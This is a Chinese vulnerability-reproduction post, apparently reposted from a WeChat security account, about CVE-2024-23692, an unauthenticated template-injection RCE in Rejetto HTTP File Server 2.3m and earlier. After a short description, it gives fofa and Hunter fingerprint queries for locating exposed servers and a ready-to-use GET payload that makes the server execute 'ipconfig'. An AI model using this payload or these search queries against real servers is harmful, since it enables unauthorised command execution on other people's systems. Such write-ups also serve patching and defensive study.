Rejetto HTTP File Server 文件服务器未经身份验证RCE(CVE-2024-23692)

admin 2024年7月3日09:12:18评论13 views字数 451阅读1分30秒阅读模式

02 漏洞描述

Rejetto HTTP File Server(Rejetto HFS)是Rejetto公司的一款 HTTP 文件服务器。Rejetto HTTP File Server 2.3m及之前版本存在安全漏洞,该漏洞源于存在模板注入漏洞。

Rejetto HFS search接口存在RCE命令执行漏洞。

03 测绘查询-系统指纹

fofa:app="HFS"
鹰图:app.name=="HTTP File Server"

【漏洞复现】Rejetto HTTP File Server 文件服务器未经身份验证RCE(CVE-2024-23692)

04 漏洞复现

1、访问漏洞系统

【漏洞复现】Rejetto HTTP File Server 文件服务器未经身份验证RCE(CVE-2024-23692)

2、GET访问 URL后面加上漏洞地址,执行ipconfig命令。
/?n=%0A&cmd=ipconfig&search=%25xxx%25url%25:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}

【漏洞复现】Rejetto HTTP File Server 文件服务器未经身份验证RCE(CVE-2024-23692)

原文始发于微信公众号(安羽安全):【漏洞复现】Rejetto HTTP File Server 文件服务器未经身份验证RCE(CVE-2024-23692)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年7月3日09:12:18
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Rejetto HTTP File Server 文件服务器未经身份验证RCE(CVE-2024-23692)https://cn-sec.com/archives/2841183.html

发表评论

匿名网友 填写信息